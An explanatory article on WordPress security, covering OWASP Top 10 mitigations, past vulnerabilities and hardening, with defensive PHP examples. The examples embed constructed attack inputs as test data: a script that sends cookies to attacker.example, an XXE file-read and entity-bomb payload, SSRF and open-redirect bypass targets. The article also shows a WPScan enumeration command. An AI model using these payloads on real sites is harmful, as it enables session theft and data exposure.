
WordPress Security and Vulnerability

This article in the series on WordPress looks at WordPress security and vulnerabilities. It examines the WordPress core, themes and plugins for security risks and notable past vulnerabilities, and explains the mechanisms WordPress provides to reduce them.

You will also be introduced to the security components and best practices that mitigate these risks.

WordPress Security

WordPress is a dynamic, reusable, extensible and community-driven open source CMS that powers millions of websites. Its versatility and modularity have made it the most popular choice for building and maintaining websites.

Whether you already use WordPress or intend to, evaluate it as a CMS and application framework from the perspectives presented here. The security information discussed herein refers to the latest releases of WordPress and of the associated themes and plugins at the time of writing.

The fact that WordPress is open source cuts both ways. Attackers study the public source of WordPress core, themes and plugins to find security holes and build attacks; the community behind WordPress studies the same code to find and close those holes first.

Each disclosed issue that gets fixed makes the software more resilient. In practice most serious issues are found in third-party plugins and themes rather than in core, so the quality and freshness of what you install matters as much as the core release you run.

WordPress Security Team

The WordPress Security Team comprises around fifty security experts, developers and researchers, including Automattic employees and individuals from around the globe.

The team identifies and resolves security issues in WordPress core. It also provides recommendations and documentation on best security practices to third-party theme and plugin developers.

Often, the team works in collaboration with external security teams and with the researchers who report issues.

WordPress Automated Updates for Security

Automated, unattended background updates for security and maintenance releases have been built into WordPress since version 3.7 (October 2013). Minor releases (for example 4.7.1 to 4.7.2) are installed automatically with no manual intervention by the site owner or administrator, as soon as the WordPress Security Team has fixed an issue and pushed the release. Major releases, themes and plugins are not updated automatically by default.

Site owners who wish to can opt out with a one-line change in wp-config.php: define( 'WP_AUTO_UPDATE_CORE', false ); disables automatic core updates, and define( 'AUTOMATIC_UPDATER_DISABLED', true ); disables the background updater entirely.

However, the WordPress Foundation and the community strongly recommend leaving the feature enabled, since a fix that is public but not yet applied is exactly what attackers look for.

WordPress and OWASP (Open Web Application Security Project)

OWASP (the Open Web Application Security Project) is an online community dedicated to web application security. Its OWASP Top 10 list identifies the most serious categories of web application security risk. The ten items discussed below follow the 2013 edition of the list, in order.

WordPress addresses the OWASP Top 10 List of security concerns as follows:


Injection

WordPress provides a set of APIs to validate and sanitize data and to escape output, which prevents injection of SQL, HTML or other code. Complementary documentation explains how to use these APIs: how to validate and sanitize input, how to escape output destined for HTML, URLs and HTTP headers, and how to protect database queries (using $wpdb->prepare() with placeholders rather than string concatenation) and files.

You can also restrict, via the upload_mimes filter, the file types that can be uploaded; by default WordPress checks both the file extension and, for images, the actual content of the file.

Broken Authentication and Session Management

To address broken authentication and session management, WordPress handles authentication and authorization itself. User IDs, usernames, password credentials, email addresses, authentication cookies, session tokens and similar sensitive data are managed server-side. Passwords are stored as salted hashes, not encrypted, so they cannot be recovered even by the site owner. A user's session is destroyed when they log out.

XSS (Cross Site Scripting)

WordPress filters untrusted HTML by default. Only trusted users may post unfiltered HTML or JavaScript in content such as posts and pages: administrators and editors on a single-site installation, and only network administrators on a multisite installation (the unfiltered_html capability).

Content created or modified by users without that capability, such as contributors and authors, is run through the wp_kses functions, which keep only an allowlist of HTML tags and attributes and strip everything else, including script tags and event-handler attributes.
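The escaping side of the injection and XSS points above, as an added example written for this article (it is not WordPress core code): three helpers in plain PHP that mirror what esc_html(), esc_attr() and esc_url() do, so the code runs without WordPress, applied to a constructed hostile comment in both the vulnerable and the hardened rendering. The wp_kses allowlist path, used when a user is allowed to keep some HTML, is not shown here.

```php
<?php
// Added example, not WordPress core code: context-aware output escaping written in
// plain PHP so it runs without WordPress. The three helpers mirror the behaviour of
// esc_html(), esc_attr() and esc_url(); the comment data below is constructed.
declare(strict_types=1);

function esc_html_like(string $text): string
{
    // Encode & < > " ' so user text is rendered as text, never parsed as markup.
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function esc_attr_like(string $text): string
{
    // The same encoding is safe inside a quoted HTML attribute value.
    return esc_html_like($text);
}

function esc_url_like(string $url): string
{
    // Only these schemes may appear in an href; javascript: and data: are refused.
    $allowed = ['http', 'https', 'mailto'];
    // Drop control characters and whitespace first: browsers ignore them inside a
    // scheme, so "java\tscript:" would otherwise slip past a naive prefix check.
    $url = preg_replace('/[\x00-\x20\x7f]/', '', trim($url)) ?? '';
    if ($url === '') {
        return '';
    }
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if ($scheme !== '' && !in_array($scheme, $allowed, true)) {
        return '';
    }
    // Relative URLs (no scheme) pass through; the value still needs attribute escaping.
    return esc_attr_like($url);
}

// Vulnerable pattern: user input concatenated straight into markup.
function render_comment_unsafe(array $c): string
{
    return '<li data-author="' . $c['author'] . '"><a href="' . $c['website'] . '">'
         . $c['author'] . '</a>: ' . $c['body'] . '</li>';
}

// Hardened pattern: every value escaped for the context it lands in.
function render_comment(array $c): string
{
    return '<li data-author="' . esc_attr_like($c['author']) . '">'
         . '<a href="' . esc_url_like($c['website']) . '">' . esc_html_like($c['author']) . '</a>: '
         . esc_html_like($c['body']) . '</li>';
}

// Constructed hostile comment: attribute breakout, javascript: link, script injection.
$comment = [
    'author'  => 'mallory" onmouseover="alert(1)',
    'website' => "java\tscript:alert(document.cookie)",
    'body'    => '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
];

echo "unsafe: ", render_comment_unsafe($comment), PHP_EOL;
echo "safe:   ", render_comment($comment), PHP_EOL;
```

Run it with php and compare the two lines: in the hardened output the quote in the author name is encoded so it cannot close the attribute, the link's href is empty because the scheme was refused, and the script tag is rendered as visible text. The general rule, which WordPress's own helpers encode, is that escaping happens at output time and is chosen by the context the value lands in (HTML body, attribute, URL), not by where the value came from.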

Insecure Direct Object Reference

WordPress does use direct object references such as the numeric IDs of users, posts and pages, but every request that acts on such an object is checked against its roles and capabilities system (for example current_user_can( 'edit_post', $post_id )), so an unauthorized request is refused even though the ID is trivial to guess.

Security Misconfiguration Prevention

In WordPress, the majority of security-relevant configuration and operations are available only to the administrator role. Your site remains secure in this respect as long as administrator credentials are not shared or leaked and the defaults are not weakened, for instance by granting elevated capabilities to other roles or by leaving administrator accounts with the default "admin" username and a weak password.

Sensitive Data Exposure

WordPress stores passwords as salted hashes produced by the phpass (portable PHP password hashing) library. A password strength meter has been part of core since version 3.7. WordPress also has options for requiring HTTPS, such as the FORCE_SSL_ADMIN constant, which forces the login and admin area onto TLS, and it sets the secure flag on its cookies when the site is served over HTTPS.

Missing Function Level Access Control

WordPress checks authorization, that is the user's capabilities, as a precondition for any privileged function. Core admin screens and request handlers verify the required capability before rendering or acting, so unauthorized users cannot reach administrative functionality simply by requesting its URL directly. Plugin and theme code is expected to apply the same current_user_can() checks to its own handlers.

CSRF (Cross Site Request Forgery)

To mitigate CSRF, WordPress uses tokens called nonces. Despite the name they are not single-use: a WordPress nonce is a short HMAC-derived token tied to a specific action (optionally including an object ID), the current user, the user's session and a time window, and it stays valid for up to 24 hours (it is generated from a 12-hour tick, and both the current and the previous tick are accepted). Nonces can be embedded in HTML forms (wp_nonce_field()) and in URLs (wp_nonce_url()). Because an attacker's page cannot obtain the token, a forged cross-site request fails the check. Nonces are a defence against CSRF only; they are not an authorization check, so a handler still needs its capability check as well.

WordPress provides the API to create and verify nonce tokens: wp_create_nonce() and wp_verify_nonce(), plus check_admin_referer() and check_ajax_referer() for admin and AJAX handlers.

Because the user's session token is part of the nonce, all nonces are invalidated when the user logs out.
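The nonce scheme described above, as an added example written for this article: a stand-alone re-implementation in plain PHP so the mechanics can be run and inspected without WordPress. It is not WordPress's own code; the secret (standing in for wp_salt( 'nonce' )), the session token, the user ID and the action names are constructed, and the tick size and 10-character slice follow the WordPress design.

```php
<?php
// Added example, not WordPress core code: a stand-alone re-implementation of the
// WordPress nonce scheme so its mechanics can be run and inspected without WordPress.
// Assumptions: NONCE_SECRET stands in for wp_salt( 'nonce' ), the session token for
// the value WordPress stores in the auth cookie, and the lifetime is the default 24 h.
declare(strict_types=1);

const NONCE_LIFE   = 86400;                       // DAY_IN_SECONDS
const NONCE_SECRET = 'constructed-site-salt-change-me';

// Two ticks per lifetime: a token is accepted for its own tick and the previous one,
// so it lives between 12 and 24 hours.
function nonce_tick(int $now): float
{
    return ceil($now / (NONCE_LIFE / 2));
}

function nonce_for_tick(float $tick, string $action, int $user_id, string $session): string
{
    $mac = hash_hmac('md5', $tick . '|' . $action . '|' . $user_id . '|' . $session, NONCE_SECRET);
    return substr($mac, -12, 10);                 // the same 10-character slice WordPress keeps
}

function create_nonce(string $action, int $user_id, string $session, int $now): string
{
    return nonce_for_tick(nonce_tick($now), $action, $user_id, $session);
}

/** Returns 1 (current tick), 2 (previous tick) or false, like wp_verify_nonce(). */
function verify_nonce(string $nonce, string $action, int $user_id, string $session, int $now)
{
    if ($nonce === '') {
        return false;
    }
    $tick = nonce_tick($now);
    if (hash_equals(nonce_for_tick($tick, $action, $user_id, $session), $nonce)) {
        return 1;
    }
    if (hash_equals(nonce_for_tick($tick - 1, $action, $user_id, $session), $nonce)) {
        return 2;
    }
    return false;
}

// Handler side: the action string embeds the object ID, so a token for post 42
// cannot be replayed against post 43. A capability check would still follow this.
function handle_delete(array $request, int $user_id, string $session, int $now): string
{
    $id = (int) ($request['id'] ?? 0);
    $ok = verify_nonce((string) ($request['_wpnonce'] ?? ''), 'delete-post_' . $id, $user_id, $session, $now);
    if ($ok === false) {
        return "request for post $id rejected: missing, invalid or expired nonce";
    }
    return "post $id deleted (nonce age class $ok)";
}

// Form side: the token is rendered into a hidden field for the current user/session.
$user = 7; $session = 'constructed-session-token'; $now = time();
$token = create_nonce('delete-post_42', $user, $session, $now);
echo '<input type="hidden" name="_wpnonce" value="', $token, '">', PHP_EOL;

$legit = ['id' => 42, '_wpnonce' => $token];
echo handle_delete($legit, $user, $session, $now), PHP_EOL;                             // genuine form post
echo handle_delete(['id' => 42], $user, $session, $now), PHP_EOL;                       // forged cross-site request carries no token
echo handle_delete(['id' => 43, '_wpnonce' => $token], $user, $session, $now), PHP_EOL; // token bound to a different object
echo handle_delete($legit, $user, 'new-session-after-logout', $now), PHP_EOL;           // logout rotated the session token
echo handle_delete($legit, $user, $session, $now + NONCE_LIFE + 1), PHP_EOL;            // beyond the 24 h window
```

Two design points worth noticing: the token is derived, not stored, so verification costs one HMAC and no database lookup; and because the session token is an HMAC input, rotating it on logout retires every outstanding nonce for that user at once, which is exactly the behaviour described above.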

Using Components with Known Vulnerabilities

Historically, WordPress closely monitors, and where needed modifies, the open source dependencies bundled with the project. A cross-site scripting vulnerability in TinyMCE was fixed in WordPress 3.5.2, and the same release replaced the SWFUpload library with Plupload, with a patched fork of SWFUpload made available for plugins that still needed it. These are examples of the core team deciding to patch, fork or replace critical external components rather than wait for upstream.

Unvalidated Redirects and Forwards

WordPress protects against open redirects internally: the wp_safe_redirect() function only redirects to the site's own host (or to hosts added through the allowed_redirect_hosts filter) and falls back to the admin URL for any other destination, so an attacker cannot use a redirect parameter to send users to an unwanted site. Plugin and theme code should use wp_safe_redirect() rather than wp_redirect() whenever the target comes from user input.
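The policy above, as an added example written for this article (not WordPress's wp_safe_redirect() itself): a guard in plain PHP that allows only the site host and an explicit allowlist, run over a constructed set of requested targets that includes the usual bypass shapes. The site host and allowlist are assumptions.

```php
<?php
// Added example, not WordPress core code: an open-redirect guard in plain PHP that
// follows the wp_safe_redirect() policy. Only the site's own host and an explicit
// allowlist may be redirect targets; anything else falls back to a safe local page.
// The site host and allowlist used below are constructed.
declare(strict_types=1);

function safe_redirect_target(string $location, string $site_host, array $allowed_hosts, string $fallback = '/'): string
{
    $location = trim($location);
    // Browsers treat "\" like "/", so "/\evil.example" would be resolved as "//evil.example".
    $location = str_replace('\\', '/', $location);
    // Raw control characters or whitespace have no place in a Location header.
    if ($location === '' || preg_match('/[\x00-\x20\x7f]/', $location)) {
        return $fallback;
    }
    $parts = parse_url($location);
    if ($parts === false) {
        return $fallback;
    }
    $scheme = strtolower($parts['scheme'] ?? '');
    if ($scheme !== '' && $scheme !== 'http' && $scheme !== 'https') {
        return $fallback;                        // javascript:, data:, and friends
    }
    if ($scheme !== '' && !isset($parts['host'])) {
        // "https:evil.example" parses here without a host, but browsers resolve
        // it to https://evil.example/, so it must not be treated as a local path.
        return $fallback;
    }
    if (preg_match('#^/{2,}#', $location) && !isset($parts['host'])) {
        return $fallback;                        // "///evil.example" style, host not recoverable
    }
    if (!isset($parts['host'])) {
        return $location;                        // a genuine local path such as /wp-admin/
    }
    $host = strtolower($parts['host']);
    $allowed = array_map('strtolower', array_merge([$site_host], $allowed_hosts));
    // Note the userinfo trick: in https://example.com@evil.example the host is evil.example.
    return in_array($host, $allowed, true) ? $location : $fallback;
}

$site    = 'example.com';
$allowed = ['accounts.example.com'];             // constructed allowlist, cf. allowed_redirect_hosts
foreach ([
    '/wp-admin/edit.php',
    'https://example.com/wp-login.php',
    'https://ACCOUNTS.example.com/',
    'https://evil.example/phish',
    '//evil.example/phish',
    '/\evil.example/phish',
    'https:evil.example',
    'https://example.com@evil.example/',
    'https://example.com.evil.example/',
    'javascript:alert(1)',
] as $requested) {
    printf("%-40s -> %s\n", $requested, safe_redirect_target($requested, $site, $allowed, '/wp-admin/'));
}
```

The first three targets are returned unchanged; every other one lands on the fallback. The check is on the parsed host, never on a string prefix such as "https://example.com", which is what lets the userinfo and subdomain-suffix cases through in naive implementations.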

Further Security Risks and Concerns

WordPress addresses many other security risks and concerns. Discussing all of them is beyond the scope of this series. Two notable ones are:

Mitigating XXE (XML eXternal Entity) processing attacks

When processing XML (for example XML-RPC requests), WordPress disables the loading of custom XML entities to prevent both external entity (XXE) attacks, which read local files or reach internal URLs, and entity expansion ("billion laughs") attacks, which exhaust memory.
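The same policy applied to untrusted XML in plain PHP, as an added example written for this article (not WordPress's own parsing code). The three documents are constructed: one benign, one carrying an external entity, one an entity-expansion bomb.

```php
<?php
// Added example, not WordPress core code: loading untrusted XML in PHP without
// resolving entities, the policy the text describes. All three documents are constructed.
declare(strict_types=1);

function load_untrusted_xml(string $xml): ?DOMDocument
{
    // Cheap pre-check: a document that declares entities is refused before the parser
    // sees the DTD. This blocks external entities (XXE) and internal ones used for
    // entity-expansion ("billion laughs") alike.
    if (stripos($xml, '<!ENTITY') !== false) {
        return null;
    }
    $previous = libxml_use_internal_errors(true);
    $doc = new DOMDocument();
    // LIBXML_NONET forbids network access while parsing. LIBXML_NOENT (entity
    // substitution) is deliberately absent: setting it is what turns an entity
    // declaration into a file read. PHP 8 also disables the external entity loader
    // by default, so this is defence in depth rather than the only barrier.
    $ok = $doc->loadXML($xml, LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($previous);
    if ($ok === false || $doc->doctype !== null) {
        return null;                    // malformed, or carries a DOCTYPE we never want
    }
    return $doc;
}

$benign = '<?xml version="1.0"?><feed><title>Hello</title></feed>';
$xxe    = '<?xml version="1.0"?>'
        . '<!DOCTYPE feed [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
        . '<feed><title>&xxe;</title></feed>';
$lol    = '<?xml version="1.0"?>'
        . '<!DOCTYPE lolz [<!ENTITY lol "lol"><!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">]>'
        . '<lolz>&lol2;</lolz>';

foreach (['benign' => $benign, 'xxe' => $xxe, 'billion-laughs' => $lol] as $name => $input) {
    $doc = load_untrusted_xml($input);
    if ($doc === null) {
        printf("%-15s rejected\n", $name);
        continue;
    }
    $node = $doc->getElementsByTagName('title')->item(0);
    printf("%-15s parsed, title=%s\n", $name, $node === null ? '(none)' : $node->textContent);
}
```

Only the benign document parses. If your application must accept documents with a DOCTYPE, drop the doctype rejection but keep the entity pre-check and never add LIBXML_NOENT or LIBXML_DTDLOAD to the parse flags.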

Mitigating SSRF (Server Side Request Forgery) Attacks

The WordPress HTTP API only allows outbound requests to standard HTTP ports (80, 443 and 8080), and it validates the target host before the request is made: hostnames that resolve to loopback or private IP addresses are refused unless explicitly permitted through the http_request_host_is_external filter. This matters because a server-side request made on behalf of a user (fetching a feed, an oEmbed, a pingback target) can otherwise be pointed at internal services that are not reachable from the Internet.
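The SSRF checks above, as an added example written for this article (not WordPress's own wp_http_validate_url()): the scheme, port and address policy in plain PHP, with DNS resolution injected so the example runs offline against a constructed table. The hostnames, addresses and table contents are constructed; in production you would pass a resolver built on gethostbynamel() or dns_get_record().

```php
<?php
// Added example, not WordPress core code: the SSRF policy the text describes, applied
// before an outbound request is made. The resolver is injected so the example runs
// offline against a constructed DNS table; in production pass one built on
// gethostbynamel() / dns_get_record(). Hostnames and addresses below are constructed.
declare(strict_types=1);

const ALLOWED_PORTS = [80, 443, 8080];           // the ports WordPress's HTTP API accepts

function is_public_ip(string $ip): bool
{
    // NO_PRIV_RANGE rejects 10/8, 172.16/12, 192.168/16 and fc00::/7;
    // NO_RES_RANGE rejects 0/8, 127/8, 169.254/16, 240/4, ::1, ::, ::ffff:0:0/96, fe80::/10.
    return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false;
}

/**
 * Returns null when the URL may be fetched, otherwise the reason it was refused.
 * $resolve maps a hostname to the list of IP strings it resolves to ([] if unknown).
 */
function ssrf_check(string $url, callable $resolve): ?string
{
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return 'not an absolute http(s) URL';
    }
    $scheme = strtolower($parts['scheme']);
    if ($scheme !== 'http' && $scheme !== 'https') {
        return "scheme '$scheme' not allowed";       // file://, gopher://, ftp:// ...
    }
    $port = $parts['port'] ?? ($scheme === 'https' ? 443 : 80);
    if (!in_array($port, ALLOWED_PORTS, true)) {
        return "port $port not allowed";
    }
    $host = strtolower(trim($parts['host'], '[]'));  // IPv6 literals arrive bracketed
    // A literal IP is checked directly; a hostname is checked on EVERY address it
    // resolves to, so a public-looking name that also points at 127.0.0.1 is caught.
    $addresses = filter_var($host, FILTER_VALIDATE_IP) !== false ? [$host] : $resolve($host);
    if ($addresses === []) {
        return "cannot resolve '$host'";
    }
    foreach ($addresses as $ip) {
        if (!is_public_ip($ip)) {
            return "'$host' resolves to non-public address $ip";
        }
    }
    return null;
}

// Constructed DNS table standing in for real resolution (203.0.113.0/24 is a
// documentation range that the filter treats as public).
$fake_dns = function (string $host): array {
    $table = [
        'api.example'      => ['203.0.113.10'],
        'rebind.example'   => ['203.0.113.10', '127.0.0.1'],   // one public, one loopback answer
        'metadata.example' => ['169.254.169.254'],              // cloud-metadata style address
    ];
    return $table[$host] ?? [];
};

foreach ([
    'https://api.example/feed.xml',
    'http://rebind.example/',
    'http://metadata.example/latest/meta-data/',
    'http://127.0.0.1:8080/',
    'http://[::1]/',
    'http://10.0.0.5/',
    'https://api.example:22/',
    'file:///etc/passwd',
    'gopher://api.example:80/',
] as $url) {
    printf("%-45s %s\n", $url, ssrf_check($url, $fake_dns) ?? 'allowed');
}
```

Only the first URL is allowed. One caveat a check like this cannot close on its own: the address is resolved once here and again by the HTTP client when it connects, so a host that changes its answer between the two lookups (DNS rebinding) can still slip through unless the client is made to connect to the address that was checked.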


Between 2007 and 2017, many security issues were reported and mitigated. A few notable ones:

In 2007, blogs carrying AdSense were targeted with a WordPress exploit. A study in the same year reported that 98% of WordPress websites were vulnerable to exploits. Automatic background updates, added in version 3.7 in 2013, were a response to this pattern of unpatched installations.

In June 2013, a review of the 50 most downloaded WordPress plugins found some of them vulnerable to common attacks such as SQL injection and XSS.

In March 2015, Search Engine Land and other security and SEO sources reported a vulnerability in the Yoast SEO plugin for WordPress: a blind SQL injection, exploitable through CSRF against a logged-in privileged user. At the time the plugin was reported to be in use on more than 14 million WordPress sites. Yoast released a fixed version immediately.

In January 2017, Sucuri identified a vulnerability in the WordPress REST API that allowed any unauthenticated user to modify the content of posts and pages on sites running WordPress 4.7 or 4.7.1. Sucuri reported it privately; the WordPress developers released version 4.7.2 with the fix and deliberately delayed public disclosure for about a week so that automatic updates could reach most sites first.

Common WordPress Security Measures

In general, WordPress websites can be additionally protected with security plugins, for example for login rate limiting, two-factor authentication and file integrity monitoring.

To stay safe, download and install WordPress, themes and plugins only from authentic sources such as WordPress.org, and keep all of them updated. Remove plugins and themes you do not use, since inactive code is still on disk and may still be reachable directly. This protects your site with minimal effort.

On the Apache web server, you can edit the .htaccess configuration file to block many attacks and to deny access to sensitive files and to executable uploads.
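An added example of such rules, written for this article and not taken from the WordPress project: Apache 2.4 configuration (the Require syntax) for a default WordPress layout. The file locations are assumptions; note that the uploads rule must live in its own .htaccess inside wp-content/uploads, because placed at the site root it would block every PHP file.

```apache
# Added example, not part of the article: hardening rules for Apache 2.4 using the
# "Require" syntax. File paths assume a default WordPress layout; adjust for yours.

# --- site root .htaccess ---------------------------------------------------------

# wp-config.php holds database credentials and the authentication salts: never serve it.
<Files "wp-config.php">
    Require all denied
</Files>

# xmlrpc.php is a frequent brute-force and amplification target; block it unless a
# client (for example the mobile app or Jetpack) really needs it.
<Files "xmlrpc.php">
    Require all denied
</Files>

# Disable directory listings (needs AllowOverride Options when set from .htaccess).
Options -Indexes

# --- wp-content/uploads/.htaccess (separate file, NOT the site root) --------------

# Nothing that was uploaded may ever execute as PHP, even if a file-type check was
# bypassed; uploads are data, not code.
<FilesMatch "\.(php|phtml|phar|php[0-9])$">
    Require all denied
</FilesMatch>
```

After editing, check the result from outside with a plain HTTP client: a request for /wp-config.php and for a .php path under /wp-content/uploads/ should both return 403, while the site itself still renders.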

If you host on your own servers, or your hosting provider allows it, run a currently supported PHP version (7.4 or later at the time of writing); PHP releases that have reached end of life no longer receive security fixes.

There are many tools for analyzing vulnerabilities, such as WPScan (for example wpscan --url https://example.com --enumerate u,p,t to enumerate users, plugins and themes), WordPress Auditor and WordPress Sploit Framework, which you can run against your own site to look for CSRF, LFI, RFI, XSS, SQL injection and user enumeration issues. Only scan sites you are authorized to test.
